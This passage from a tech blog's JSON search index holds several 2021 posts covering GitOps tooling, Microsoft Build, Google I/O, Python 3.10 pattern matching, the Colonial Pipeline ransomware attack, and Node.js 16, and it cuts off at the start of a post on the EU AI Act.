set of specialized controllers:\nSource Controller watches Git repos, Helm repos, and S3 buckets Kustomize Controller handles Kustomize-based reconciliation Helm Controller manages Helm releases Notification Controller handles alerts and webhooks Image Automation Controllers can automatically update image tags in Git This composability means you can use only the pieces you need. If you\u0026rsquo;re pure Kustomize, you don\u0026rsquo;t need the Helm controller. If you want automated image updates (a controversial feature that ArgoCD deliberately doesn\u0026rsquo;t include by default), Flux has purpose-built controllers for it.\nFlux v2 is also built entirely on Kubernetes APIs using custom resources, which means standard Kubernetes tooling (kubectl, RBAC, audit logs) works naturally with it. There\u0026rsquo;s no separate API server or UI to manage — it\u0026rsquo;s Kubernetes-native through and through.\nThe GitOps Working Group and Standardization # Perhaps the most consequential development is the GitOps Working Group effort to create a vendor-neutral definition and set of principles for GitOps. The working group includes contributors from Weaveworks (Flux), Intuit/Codefresh (Argo), Microsoft, AWS, and others.\nHaving a shared definition matters because \u0026ldquo;GitOps\u0026rdquo; has become a marketing term that gets slapped on anything involving Git and deployment. A formal set of principles helps the community distinguish genuine GitOps implementations from CI/CD pipelines with a Git trigger.\nThe draft principles emphasize four key aspects: declarative desired state, versioned and immutable state in Git, automated agents that pull and apply changes, and continuous reconciliation with drift detection. If your deployment process doesn\u0026rsquo;t include all four, it\u0026rsquo;s not GitOps — it\u0026rsquo;s just CI/CD with Git, which is fine, but it\u0026rsquo;s a different thing.\nMy Take # After running ArgoCD in production and evaluating Flux v2, my recommendation for teams getting started with GitOps is straightforward: if you want a batteries-included solution with a great UI, choose ArgoCD. If you prefer a composable, Kubernetes-native toolkit and don\u0026rsquo;t need a web interface, choose Flux. Both are excellent, both are CNCF-backed, and both will serve you well.\nThe more important decision is whether to adopt GitOps at all, and I\u0026rsquo;d argue that for any team running more than a handful of services on Kubernetes, the answer is yes. The benefits are substantial: auditable deployment history through Git commits, automatic drift detection and correction, easier disaster recovery (just point the agent at the Git repo), and a deployment process that doesn\u0026rsquo;t require sharing cluster credentials with your CI system.\nWe\u0026rsquo;re past the \u0026ldquo;early adopter\u0026rdquo; phase for GitOps. The tooling is mature, the community is vibrant, and the CNCF\u0026rsquo;s investment signals long-term sustainability. If you\u0026rsquo;re still doing imperative kubectl apply from CI pipelines, now is a good time to make the switch.\n","date":"3 June 2021","externalUrl":null,"permalink":"/posts/210603-gitops-argocd-cncf-incubation/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"With ArgoCD accepted into CNCF incubation and Flux reaching its own milestones, GitOps is transitioning from buzzword to standard practice for Kubernetes deployments.","title":"GitOps Goes Mainstream — ArgoCD, Flux, and the CNCF Bet","type":"posts"},{"content":"Microsoft Build wrapped up yesterday, and if there\u0026rsquo;s a single thread running through this year\u0026rsquo;s announcements, it\u0026rsquo;s this: Microsoft is systematically building the most integrated developer platform in the industry. From Azure to GitHub to VS Code to the underlying infrastructure, the pieces are fitting together in ways that should make both developers and competitors pay close attention.\nAzure\u0026rsquo;s Cloud-Native Push # The Azure announcements at Build were heavily focused on cloud-native development. Azure Container Apps — well, the early hints of what\u0026rsquo;s coming in that direction — point toward making container deployment dramatically simpler. The goal appears to be offering something between the full complexity of AKS (Azure Kubernetes Service) and the limitations of Azure Functions: a way to run containerized workloads without managing Kubernetes clusters yourself.\nMore practically relevant for many developers is the continued evolution of Azure Static Web Apps, which is now generally available. It\u0026rsquo;s a smart product that integrates static site hosting, serverless API backends, CI/CD through GitHub Actions, and authentication into a single service. I\u0026rsquo;ve been using it for a few side projects, and the developer experience is genuinely smooth — push to GitHub, and your site deploys automatically with a preview URL for pull requests.\nThe Azure Arc expansion was also significant. Arc is Microsoft\u0026rsquo;s hybrid and multi-cloud management layer, and the new capabilities around running Azure services on any Kubernetes cluster — including on-premises and on competing clouds — represent a serious strategic play. If you can run Azure SQL, Azure App Services, and Azure ML on your own infrastructure managed through the Azure control plane, the boundary between \u0026ldquo;Azure\u0026rdquo; and \u0026ldquo;not Azure\u0026rdquo; starts to blur in interesting ways.\nGitHub and the Inner Loop # The GitHub announcements were where Build got really interesting for my daily workflow. GitHub Copilot — the AI pair programmer built on OpenAI Codex — was the headline grabber. It\u0026rsquo;s currently in limited technical preview, and the demos showed it suggesting entire function implementations, test cases, and even documentation based on context and comments.\nI haven\u0026rsquo;t gotten access yet, so I\u0026rsquo;ll reserve detailed judgment. But the concept is compelling: rather than AI replacing developers, it acts as an autocomplete system that understands code context at a much deeper level than existing tools. The training data (public GitHub repositories) raises questions about licensing and attribution that the community will need to work through, but the potential productivity impact is enormous.\nBeyond Copilot, GitHub Codespaces going generally available is arguably the more impactful announcement for day-to-day development. Full VS Code development environments running in the cloud, preconfigured per repository through devcontainer.json, accessible from any browser. I\u0026rsquo;ve been using Codespaces in beta for months, and it\u0026rsquo;s changed how I think about development environments. No more \u0026ldquo;works on my machine\u0026rdquo; — the development environment is defined in code and runs identically for every contributor.\nThe combination of Codespaces for development, Actions for CI/CD, and Copilot for coding assistance gives GitHub a remarkably complete developer workflow. Add Packages for artifact management and the security features (Dependabot, code scanning, secret scanning), and Microsoft has assembled something that\u0026rsquo;s hard to match.\nPower Platform and the Low-Code Angle # Build also featured heavy investment in Power Platform, Microsoft\u0026rsquo;s low-code development suite. This is an area where I have mixed feelings. Power Apps and Power Automate are genuinely useful for certain categories of business applications — internal tools, workflow automation, data collection forms — that would otherwise either not get built or consume developer time on low-value work.\nThe new Power Fx language, based on Excel formula syntax, is an interesting choice. Given that hundreds of millions of people already know Excel formulas, building a programming language on that foundation makes a kind of pragmatic sense even if it makes language purists uncomfortable.\nWhere I get cautious is when organizations start building critical business logic in low-code platforms. The governance, testing, and maintenance challenges of low-code applications at scale are real and often underestimated. But as a complement to professional development rather than a replacement for it, Power Platform fills a legitimate gap.\n.NET 6 Preview and the Performance Story # The .NET 6 previews shown at Build continued the impressive performance trajectory. Hot reload for both ASP.NET Core and MAUI (the cross-platform UI framework replacing Xamarin.Forms) is a quality-of-life improvement that modern developers expect. The Minimal APIs feature in ASP.NET Core reduces the boilerplate for simple web APIs to just a few lines of code, bringing .NET closer to the simplicity of Express.js or Flask for straightforward services.\nThe performance benchmarks are genuinely impressive. .NET continues to dominate the TechEmpower framework benchmarks, and .NET 6 is pushing the numbers even further. For anyone who still thinks of .NET as the slow, Windows-only enterprise framework of the 2000s, it\u0026rsquo;s worth revisiting those assumptions.\nMy Take # Microsoft\u0026rsquo;s strategy is becoming clearer with each Build conference: own the developer platform end-to-end. Azure for infrastructure, GitHub for code and collaboration, VS Code for editing, .NET for the runtime, and AI for assistance. Each piece reinforces the others, and the integration points are getting smoother every year.\nWhat impresses me most is that they\u0026rsquo;re doing this while remaining genuinely open. VS Code is open source. .NET is open source. GitHub supports every language and framework. Azure runs Linux better than Windows in many scenarios. This isn\u0026rsquo;t the Microsoft of 2001 — it\u0026rsquo;s a company that understood, eventually, that developers choose platforms based on capability and openness, not vendor mandate.\nThe risk, of course, is that this integrated platform becomes a walled garden over time. But for now, the developer experience improvements are real, and competition from AWS and Google keeps everyone honest. If you haven\u0026rsquo;t looked at the Microsoft developer ecosystem recently, Build 2021 is a good reason to take another look.\n","date":"27 May 2021","externalUrl":null,"permalink":"/posts/210527-microsoft-build-2021-developer-platform/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Microsoft Build 2021 doubled down on the developer platform strategy with Azure improvements, deeper GitHub integration, and a clearer vision for the cloud-native developer workflow.","title":"Microsoft Build 2021 — The Developer Platform Play Deepens","type":"posts"},{"content":"Google I/O returned this week after skipping 2020 entirely, and the AI announcements were, for once, more substance than spectacle. Don\u0026rsquo;t get me wrong — there were still the obligatory jaw-dropping demos (LaMDA having a conversation as Pluto was certainly a moment). But what caught my attention as a developer were the practical, unglamorous improvements that actually make AI more usable in production systems. This platform strategy mirrors what Microsoft is doing with Azure and broader cloud consolidation trends.\nTensorFlow Gets Serious About the Full Lifecycle # The TensorFlow announcements at I/O focused heavily on what happens after you train a model. TensorFlow Decision Forests brings gradient boosted trees and random forests into the TensorFlow ecosystem, which is significant because not every ML problem needs a neural network. Sometimes a well-tuned gradient boosted model outperforms a deep learning approach, trains in minutes instead of hours, and is far easier to explain to stakeholders.\nThere\u0026rsquo;s also the continued investment in TFX (TensorFlow Extended) for production ML pipelines. The gap between \u0026ldquo;model works in a Jupyter notebook\u0026rdquo; and \u0026ldquo;model runs reliably in production\u0026rdquo; has always been massive, and TFX is one of the most serious attempts to close it. New features around data validation and model monitoring address the unglamorous but critical work of catching data drift and model degradation before they become business problems.\nThis is the kind of AI progress I care about. Training a model is maybe 20% of the work in a real ML system. The other 80% is data pipelines, monitoring, retraining, serving infrastructure, and all the boring plumbing that determines whether your ML project actually delivers value or becomes a failed experiment gathering dust.\nVertex AI: One Platform to Rule Them All # Google\u0026rsquo;s biggest announcement for ML practitioners was Vertex AI, a managed platform that consolidates their previously scattered ML services into a single unified offering. Previously, if you wanted to build ML on Google Cloud, you had to navigate AI Platform Training, AI Platform Prediction, AutoML, and several other services that had overlapping functionality and inconsistent interfaces.\nVertex AI promises a single API surface for the full ML workflow: data preparation, training (both custom and AutoML), hyperparameter tuning, deployment, monitoring, and feature management with a built-in feature store.\nI haven\u0026rsquo;t had extensive hands-on time yet, but the architecture looks sensible. The feature store integration is particularly interesting — feature stores have been one of those infrastructure components that every serious ML team needs but few have the resources to build properly. Having it integrated into the platform rather than being a separate service you have to wire up could meaningfully reduce the complexity of ML operations.\nThe competitive landscape here is clear: AWS has SageMaker, Azure has Azure ML, and now Google has Vertex AI. All three are converging on similar architectures, which suggests the industry is settling on a common understanding of what ML platforms need to look like. This platform consolidation pattern will accelerate over the next few years, with each cloud provider trying to make their AI services the default choice. That\u0026rsquo;s a good sign for standardization and portability, even if the vendor lock-in concerns remain real.\nLaMDA and the Language Model Race # I\u0026rsquo;d be remiss not to mention LaMDA (Language Model for Dialogue Applications), Google\u0026rsquo;s conversational AI system. The demo was impressive — the model held coherent, contextual conversations while role-playing as Pluto and a paper airplane, drawing on factual knowledge while maintaining character.\nBut I want to temper the excitement with some engineering pragmatism. These large language models are extraordinary at generating plausible, fluent text. They\u0026rsquo;re still not reliable for factual accuracy, they still hallucinate confidently, and they still require enormous computational resources to run. The journey from research demo to production deployment would accelerate dramatically when ChatGPT landed later that year. Google showed a polished demo, but the path from \u0026ldquo;impressive demo\u0026rdquo; to \u0026ldquo;product you can actually deploy and trust\u0026rdquo; is long and expensive.\nWhat\u0026rsquo;s more interesting to me is how Google plans to make these capabilities available to developers. The Keynote hinted at future APIs but was light on specifics. If Google can offer LaMDA-like capabilities through a practical, affordable API — similar to what OpenAI is doing with GPT-3 — that would be genuinely transformative for application developers. But we\u0026rsquo;re not there yet, and promises made at I/O have a mixed track record of materializing.\nAndroid 12 and On-Device ML # The Android 12 preview showed continued investment in on-device machine learning. The new ML-backed features — smarter auto-rotate using face detection, improved speech recognition, better smart reply — all run on-device, which matters enormously for both privacy and latency.\nFor Android developers, the expansion of ML Kit and the improvements to the NNAPI (Neural Networks API) lower the barrier to incorporating on-device ML into apps. The trend is clearly toward making ML a standard tool in mobile development rather than a specialist capability.\nThis aligns with a broader industry direction: pushing ML inference to the edge rather than always requiring a round-trip to the cloud. Between Google\u0026rsquo;s on-device push, Apple\u0026rsquo;s Core ML improvements, and the growing ecosystem of edge ML frameworks, we\u0026rsquo;re approaching a world where basic ML capabilities are as standard in mobile apps as networking or local storage.\nMy Take # Google I/O 2021 felt like a maturation point for AI in the developer ecosystem. The flashy demos will get the headlines, but the substantive announcements — Vertex AI consolidating the ML platform, TensorFlow Decision Forests acknowledging that not everything needs deep learning, improved production ML tooling — these are the things that will actually change how developers work.\nI\u0026rsquo;ve been building systems that incorporate ML components for several years now, and the single biggest challenge has never been model accuracy. It\u0026rsquo;s been operational complexity. Every tool that reduces the gap between \u0026ldquo;works on my laptop\u0026rdquo; and \u0026ldquo;runs reliably in production\u0026rdquo; is worth paying attention to, and Google clearly understands that the next battleground in cloud AI isn\u0026rsquo;t model performance — it\u0026rsquo;s developer experience and operational simplicity.\nThe question, as always with Google, is follow-through. They have a habit of launching services with fanfare and then quietly deprecating them two years later. If Vertex AI is still a priority in 2023, I\u0026rsquo;ll be impressed. For now, I\u0026rsquo;m cautiously optimistic that we\u0026rsquo;re entering an era where ML tooling finally catches up to the promise of the underlying technology.\n","date":"20 May 2021","externalUrl":null,"permalink":"/posts/210520-google-io-2021-ai-ml-advances/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Google I/O 2021 showcased AI advances that prioritize practical developer tooling over flashy demos — a shift that signals real maturity in the field.","title":"Google I/O 2021 — AI Gets Practical, and That's What Matters","type":"posts"},{"content":"Python 3.10 beta 1 dropped on May 3rd, and while there are several nice improvements in this release, one feature dominates the conversation: structural pattern matching. Implemented through PEP 634, 635, and 636, this is arguably the most significant syntax addition to Python since async/await landed in 3.5. Following on from Python 3.9\u0026rsquo;s improvements, this release continues Python\u0026rsquo;s steady march toward more expressive syntax. Having spent the past week experimenting with it, I have thoughts — mostly positive, with some caveats.\nMore Than a Switch Statement # The immediate reaction from many developers has been \u0026ldquo;Python finally gets a switch statement.\u0026rdquo; That\u0026rsquo;s technically true but dramatically undersells what structural pattern matching actually is. If you\u0026rsquo;ve used pattern matching in Rust, Scala, or Elixir, you\u0026rsquo;ll recognize the power here. If you haven\u0026rsquo;t, prepare to rethink how you handle complex conditional logic.\nThe basic syntax uses match and case:\ndef handle_command(command): match command: case \u0026#34;quit\u0026#34;: return shutdown() case \u0026#34;status\u0026#34;: return get_status() case other: return f\u0026#34;Unknown command: {other}\u0026#34; That looks like a switch statement, sure. But the real power emerges when you start matching against structures:\ndef process_event(event): match event: case {\u0026#34;type\u0026#34;: \u0026#34;click\u0026#34;, \u0026#34;position\u0026#34;: (x, y)}: handle_click(x, y) case {\u0026#34;type\u0026#34;: \u0026#34;keypress\u0026#34;, \u0026#34;key\u0026#34;: str(k)} if len(k) == 1: handle_keypress(k) case {\u0026#34;type\u0026#34;: \u0026#34;resize\u0026#34;, \u0026#34;dimensions\u0026#34;: (w, h)} if w \u0026gt; 0 and h \u0026gt; 0: handle_resize(w, h) You\u0026rsquo;re destructuring dictionaries, binding variables, applying type checks, and adding guard clauses — all in a readable, declarative syntax. This is a fundamental improvement over chains of if/elif with nested dictionary access and type checking.\nWhere This Actually Shines # I\u0026rsquo;ve been refactoring some of my own code to use pattern matching, and the areas where it excels are clear.\nAPI response handling is the obvious one. If you work with REST APIs or message queues, you\u0026rsquo;re constantly writing code that inspects the shape of incoming data and branches accordingly. Pattern matching makes this dramatically cleaner:\nmatch response.json(): case {\u0026#34;status\u0026#34;: \u0026#34;ok\u0026#34;, \u0026#34;data\u0026#34;: {\u0026#34;users\u0026#34;: [first, *rest]}}: process_user(first) queue_remaining(rest) case {\u0026#34;status\u0026#34;: \u0026#34;error\u0026#34;, \u0026#34;code\u0026#34;: 429, \u0026#34;retry_after\u0026#34;: seconds}: schedule_retry(seconds) case {\u0026#34;status\u0026#34;: \u0026#34;error\u0026#34;, \u0026#34;code\u0026#34;: code, \u0026#34;message\u0026#34;: msg}: log_error(code, msg) AST processing and compiler work benefits enormously. If you\u0026rsquo;re writing linters, code transformers, or DSL interpreters — all increasingly common in the Python ecosystem — pattern matching is a natural fit.\nState machine implementations become more readable too. Instead of sprawling if/elif chains checking current state and input combinations, you match on tuples of (state, event) and the code reads almost like a state transition table.\nThe Controversy: Is This Pythonic? # Not everyone is happy. The discussion around PEPs 634-636 was one of the most heated in recent Python governance history. Critics argue that pattern matching adds significant complexity to the language for a feature that experienced Python developers have been working without for 30 years. The match and case keywords are \u0026ldquo;soft keywords\u0026rdquo; — they\u0026rsquo;re only treated as keywords in the context of a match statement, which means existing code using match or case as variable names won\u0026rsquo;t break, but it does add cognitive overhead to the parser and to developers reading code.\nThere\u0026rsquo;s also the learning curve concern. Python\u0026rsquo;s strength has always been its readability and gentle learning curve. Structural pattern matching, especially with guard clauses, class patterns, and nested destructuring, introduces concepts that are genuinely advanced. A newcomer encountering case Point(x, y) if x \u0026gt; 0: for the first time has a lot to unpack.\nI understand these concerns, but I think they\u0026rsquo;re outweighed by the benefits. Python has grown beyond its scripting roots. It\u0026rsquo;s now a dominant language in data science, web backends, DevOps tooling, and increasingly in systems programming. The developers using Python today need these kinds of expressive constructs, and the alternative — convoluted if/elif chains with isinstance checks — isn\u0026rsquo;t exactly a paragon of readability either.\nPerformance Considerations # One question I haven\u0026rsquo;t seen adequately addressed yet is performance. The beta implementation compiles match statements to a sequence of checks, similar to how the equivalent if/elif chain would work. There\u0026rsquo;s no jump table optimization for simple value matching, at least not yet.\nFor most use cases, this doesn\u0026rsquo;t matter — you\u0026rsquo;re typically matching against a handful of cases, not thousands. But it\u0026rsquo;s worth noting that pattern matching is primarily a readability and expressiveness feature, not a performance one. If you\u0026rsquo;re expecting C-style switch statement performance with computed gotos, you\u0026rsquo;ll be disappointed.\nThe CPython team may optimize this in future releases, but for now, treat it as syntactic improvement rather than a performance tool.\nMy Take # After a week of experimentation, I\u0026rsquo;m genuinely excited about structural pattern matching in Python. It\u0026rsquo;s the kind of feature that, once you start using it, makes you wonder how you wrote certain kinds of code without it. The API response handling pattern alone will save me dozens of lines of awkward nested dictionary access in several active projects. This represents Python\u0026rsquo;s evolution from a simple scripting language into a sophisticated systems language.\nThat said, I\u0026rsquo;d caution against the temptation to use it everywhere. Not every conditional needs pattern matching. A simple if x \u0026gt; 10 doesn\u0026rsquo;t become better as match x: case n if n \u0026gt; 10:. Use it where you\u0026rsquo;re genuinely matching against structure — destructuring data, handling multiple message types, implementing state machines. That\u0026rsquo;s where it shines.\nPython 3.10 final is expected in October. Between now and then, the beta period is exactly the right time to experiment and provide feedback. If you maintain a library, start testing against 3.10 now — not for pattern matching compatibility, but because several other changes around type hints, error messages, and deprecations might affect your code.\nThe language keeps evolving, and this time, it\u0026rsquo;s evolving in a direction I\u0026rsquo;m genuinely enthusiastic about.\n","date":"13 May 2021","externalUrl":null,"permalink":"/posts/210513-python-310-structural-pattern-matching/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Python 3.10’s first beta introduces structural pattern matching — the most significant syntax addition since async/await, and it’s worth understanding deeply.","title":"Python 3.10 Beta 1 — Structural Pattern Matching Changes Everything","type":"posts"},{"content":"Last Friday, Colonial Pipeline — the company responsible for nearly half the fuel supply to the US East Coast — confirmed it had been hit by a ransomware attack. The company shut down its entire pipeline system, roughly 5,500 miles of infrastructure, as a precaution. As I write this, the pipeline remains offline, and the implications are still unfolding. But the technical lessons are already clear, and they should concern every engineer working on systems that touch the physical world.\nThe Attack Vector: DarkSide and Double Extortion # The attack has been attributed to DarkSide, a ransomware-as-a-service (RaaS) operation that\u0026rsquo;s been active since mid-2020. What makes DarkSide particularly insidious is its \u0026ldquo;double extortion\u0026rdquo; model: they don\u0026rsquo;t just encrypt your data, they exfiltrate it first and threaten to publish it if you don\u0026rsquo;t pay.\nFrom what\u0026rsquo;s been reported so far, the attack targeted Colonial\u0026rsquo;s IT systems — the business side — rather than the operational technology (OT) systems that directly control the pipeline. But here\u0026rsquo;s the critical detail: Colonial shut down the OT systems preemptively because they couldn\u0026rsquo;t be confident the attackers hadn\u0026rsquo;t moved laterally into those networks.\nThis is the nightmare scenario that industrial control system (ICS) security professionals have been warning about for years. The convergence of IT and OT networks creates attack surfaces that didn\u0026rsquo;t exist a decade ago. When your business systems and your control systems share any connectivity whatsoever, compromising one puts the other at risk. The trend of supply chain compromise affecting critical infrastructure has evolved from IT software to operational technology.\nThe Air Gap Myth # I\u0026rsquo;ve spent years working on systems where the assumption was \u0026ldquo;our critical infrastructure is air-gapped.\u0026rdquo; In my experience, true air gaps are extraordinarily rare in practice. What most organizations have is a belief in an air gap, supported by a network diagram drawn five years ago that no longer reflects reality.\nThe truth is that modern industrial systems need data flowing between OT and IT layers for monitoring, analytics, and optimization. Someone eventually connects a historian server. Someone sets up remote access for a vendor. Someone plugs in a USB drive to update firmware. Each of these is a bridge across the supposed gap.\nColonial Pipeline reportedly had some level of network segmentation between IT and OT, but the fact that they couldn\u0026rsquo;t confidently say \u0026ldquo;no, the attackers can\u0026rsquo;t reach our pipeline controls\u0026rdquo; tells you everything about how effective that segmentation actually was.\nFor those of us building and maintaining systems: network segmentation isn\u0026rsquo;t a one-time architecture decision. It\u0026rsquo;s an ongoing operational discipline that needs continuous verification. Tools like Shodan regularly find industrial control systems exposed directly to the internet. If external researchers can find them, so can DarkSide.\nRansomware as a Supply Chain Problem # What strikes me about this incident is the scale of the downstream impact. Colonial Pipeline is a single company, but its shutdown affects fuel distribution across the entire eastern United States. Gas stations are running dry. Airlines are scrambling for fuel. And it\u0026rsquo;s all because of one compromised organization. We\u0026rsquo;ve seen this pattern before — SolarWinds showed us how a single compromised vendor can have cascading effects, and Codecov demonstrated it with developer tools.\nThis is a supply chain problem in the most literal sense. We\u0026rsquo;ve spent the last year talking about software supply chain security — SolarWinds, Codecov, dependency confusion attacks — but Colonial Pipeline reminds us that physical supply chains have the same single-point-of-failure vulnerabilities.\nAs engineers, we need to think about this from both directions. If you\u0026rsquo;re building systems for critical infrastructure, the security bar isn\u0026rsquo;t \u0026ldquo;good enough for a SaaS product.\u0026rdquo; You need defense in depth, you need incident response plans that assume breach, and you need the ability to operate in degraded mode rather than shutting everything down because you can\u0026rsquo;t verify what\u0026rsquo;s been compromised.\nIncident Response: The Hard Choices # Colonial\u0026rsquo;s decision to shut down the pipeline entirely is being second-guessed by some, but I think it was the right call given the information they had. When you can\u0026rsquo;t verify the integrity of your control systems, running a pipeline that carries highly flammable materials is an unacceptable risk.\nBut it exposes a massive gap in most organizations\u0026rsquo; incident response planning: what do you do when your IR plan says \u0026ldquo;isolate affected systems\u0026rdquo; but isolating those systems means shutting down critical national infrastructure?\nThis is where tabletop exercises earn their keep. Every organization running critical infrastructure should be running scenarios like this regularly. Not just \u0026ldquo;ransomware hits the file server\u0026rdquo; but \u0026ldquo;ransomware hits the business network and we can\u0026rsquo;t verify OT integrity.\u0026rdquo; The decisions you need to make in that scenario — who has authority to shut down operations, how do you communicate with customers and regulators, what\u0026rsquo;s your manual operations fallback — those decisions need to be made before you\u0026rsquo;re in the middle of a crisis. The lessons from CrowdStrike\u0026rsquo;s global outage and other systemic failures show that recovery planning needs to account for worst-case scenarios.\nMy Take # I\u0026rsquo;ve been in this industry long enough to have watched the IT/OT convergence happen in real time, and the Colonial Pipeline attack is, sadly, exactly the kind of incident many of us have been predicting. The uncomfortable reality is that our critical infrastructure was built in an era when \u0026ldquo;connected\u0026rdquo; meant something very different, and we\u0026rsquo;ve been bolting on connectivity faster than we\u0026rsquo;ve been bolting on security.\nThe DarkSide group has reportedly said they \u0026ldquo;didn\u0026rsquo;t intend to create problems for society\u0026rdquo; and only wanted money. That\u0026rsquo;s almost darkly funny — it shows how even the attackers didn\u0026rsquo;t fully grasp the cascading effects of what they were doing. When you attack infrastructure at this scale, intent is irrelevant; impact is everything.\nFor those of us in the developer and DevOps world, the takeaway is this: the systems we build don\u0026rsquo;t exist in isolation. That API you\u0026rsquo;re connecting to a SCADA system, that dashboard you\u0026rsquo;re building for pipeline monitoring, that cloud migration you\u0026rsquo;re planning for operational data — all of it is expanding the attack surface of systems that people depend on for basic necessities.\nSecurity isn\u0026rsquo;t someone else\u0026rsquo;s problem. It\u0026rsquo;s built into every architectural decision we make, every network connection we allow, and every assumption we fail to verify.\n","date":"6 May 2021","externalUrl":null,"permalink":"/posts/210506-colonial-pipeline-ransomware/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The Colonial Pipeline ransomware attack exposes how deeply intertwined our digital infrastructure has become with physical systems we take for granted.","title":"Colonial Pipeline Ransomware — When Cybersecurity Meets Critical Infrastructure","type":"posts"},{"content":"Node.js 16 was released last week as the new Current release line, and while it doesn\u0026rsquo;t bring any single revolutionary feature, the collection of improvements adds up to a meaningful step forward. Following Node.js 14, this release continues the platform\u0026rsquo;s steady evolution. The release includes native Apple Silicon (M1) binaries for the first time, ships V8 9.0 with several new JavaScript language features, and stabilizes the Timers Promises API that makes working with timers in async code far more ergonomic.\nNode 16 will enter Long Term Support (LTS) in October 2021, making it the version most production environments will standardize on for the next couple of years. Here\u0026rsquo;s what\u0026rsquo;s worth paying attention to.\nNative Apple Silicon Support # For the growing number of developers who have switched to Apple\u0026rsquo;s M1 machines, Node.js 16 provides prebuilt binaries for the darwin-arm64 architecture. Previous versions could run on M1 through Rosetta 2 emulation, which worked but added overhead and occasional compatibility issues with native addons.\nThis matters more than it might seem. The M1\u0026rsquo;s performance advantage is significant — builds that took 30 seconds on an Intel MacBook Pro can finish in under 15 seconds on M1, but only if you\u0026rsquo;re running native code. Running Node through Rosetta 2 ate into that performance gain, and some native addon compilation workflows were fragile or broken entirely.\nI switched my primary development machine to an M1 MacBook Pro in February, and while the Rosetta experience was surprisingly good, there were enough paper cuts with native module compilation — particularly around node-gyp and modules that depend on architecture-specific binaries — that having official arm64 builds is a welcome relief. If you\u0026rsquo;re managing a team with mixed architectures, the official support also simplifies your CI matrix.\nV8 9.0 and New Language Features # Node.js 16 ships with V8 9.0, which brings several JavaScript features that have been working through the TC39 standards process. This pattern of language evolution mirrors what we\u0026rsquo;re seeing in TypeScript\u0026rsquo;s type system improvements:\nRegExp match indices (d flag) — When you use the new /d flag with a regular expression, the match object includes an indices property that tells you the start and end positions of each captured group. This is incredibly useful for syntax highlighting, code editors, and any application that needs to know where in the string a match occurred, not just what matched.\nconst match = /(hello) (world)/.exec(\u0026#39;say hello world\u0026#39;); // Standard match: [\u0026#39;hello world\u0026#39;, \u0026#39;hello\u0026#39;, \u0026#39;world\u0026#39;] const matchWithIndices = /(hello) (world)/d.exec(\u0026#39;say hello world\u0026#39;); // matchWithIndices.indices: [[4, 15], [4, 9], [10, 15]] Promise.any and AggregateError — Promise.any resolves with the first fulfilled promise (as opposed to Promise.race, which resolves with the first settled promise, whether fulfilled or rejected). If all promises reject, it throws an AggregateError containing all the rejection reasons. This is useful for patterns like trying multiple API endpoints and taking the first successful response.\nLogical assignment operators — \u0026amp;\u0026amp;=, ||=, and ??= combine logical operations with assignment. These have been available in recent V8 versions, but their presence in the Node 16 LTS line means they\u0026rsquo;re now safe to use in production code without transpilation.\n// Before user.name = user.name || \u0026#39;Anonymous\u0026#39;; // After user.name ||= \u0026#39;Anonymous\u0026#39;; // Nullish coalescing assignment config.timeout ??= 3000; // Only assigns if null or undefined The Timers Promises API # The most practically useful addition in Node 16, in my opinion, is the stabilization of the Timers Promises API (timers/promises). This module provides promise-based versions of setTimeout, setInterval, and setImmediate that work naturally with async/await. This represents the kind of ergonomic improvement that makes Node.js development more productive.\nBefore this API, using timers in async code required wrapping them in promises manually:\n// The old way function sleep(ms) { return new Promise(resolve =\u0026gt; setTimeout(resolve, ms)); } await sleep(1000); // Node 16 way import { setTimeout } from \u0026#39;timers/promises\u0026#39;; await setTimeout(1000); The setInterval version is even more compelling — it returns an async iterator, which means you can use for await...of to consume ticks:\nimport { setInterval } from \u0026#39;timers/promises\u0026#39;; for await (const _ of setInterval(1000)) { console.log(\u0026#39;tick\u0026#39;); // break when done } This is a small addition, but it eliminates one of those annoying friction points that every Node developer has encountered. I\u0026rsquo;ve probably written that sleep utility function in a hundred different projects. Having it in the standard library, with proper AbortController support for cancellation, is a quality-of-life improvement that I\u0026rsquo;ll immediately start using.\nWeb Crypto API (Experimental) # Node 16 also includes an experimental implementation of the Web Crypto API, accessible via globalThis.crypto and crypto.webcrypto. This is part of the broader effort to align Node.js APIs with web platform standards, making it easier to write isomorphic code that runs in both Node and the browser.\nThe existing Node crypto module isn\u0026rsquo;t going anywhere, but having a standards-compliant Web Crypto API means that cryptographic code written for the browser can run in Node without modification. For library authors who target both environments, this reduces the need for platform-specific code paths and bundler configurations.\nnpm 7 by Default # Node 16 ships with npm 7, which is now the default package manager. If you\u0026rsquo;ve been on Node 14 with npm 6, the upgrade brings several notable changes: automatic installation of peer dependencies, workspaces support for monorepos, and the new package-lock.json format (v2). The peer dependency change in particular can cause breakage on upgrade — packages that previously installed with only warnings may now fail if peer dependencies conflict. Run npm install in your projects after upgrading and resolve any conflicts before they surprise you in CI.\nMy Take # Node.js 16 is a solid, pragmatic release. It doesn\u0026rsquo;t try to reinvent the runtime — instead, it focuses on catching up with the JavaScript language, improving platform support, and polishing APIs that developers use daily. That\u0026rsquo;s exactly the right approach for a runtime that\u0026rsquo;s become critical infrastructure for a huge portion of the web.\nThe Apple Silicon support and V8 9.0 upgrades are expected evolutions, but the Timers Promises API is the kind of small improvement that disproportionately improves developer experience. It\u0026rsquo;s the difference between a runtime that can do async and one that\u0026rsquo;s designed for async at every level.\nIf you\u0026rsquo;re currently on Node 14 LTS, there\u0026rsquo;s no rush to upgrade production systems — Node 14 is supported until April 2023. But I\u0026rsquo;d recommend starting to test your applications against Node 16 now, particularly if you have native addons or rely on specific npm 6 behaviors. When Node 16 enters LTS in October, you\u0026rsquo;ll want to be ready for a smooth transition.\n","date":"29 April 2021","externalUrl":null,"permalink":"/posts/210429-nodejs-16-release/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Node.js 16 arrives with native Apple Silicon binaries, V8 9.0 bringing new JavaScript features, and the stabilization of the Timers Promises API that cleans up async timer patterns.","title":"Node.js 16 — Apple Silicon, V8 9.0, and the Timers Promise API","type":"posts"},{"content":"Yesterday, the European Commission published its proposal for the Artificial Intelligence Act — the first comprehensive legal framework for AI anywhere in the world. Like GDPR before it, this regulation is poised to have an impact far beyond Europe\u0026rsquo;s borders. If you build software that involves any form of machine learning or automated decision-making, this proposal deserves your attention.\nThe core approach is risk-based, categorizing AI systems into four 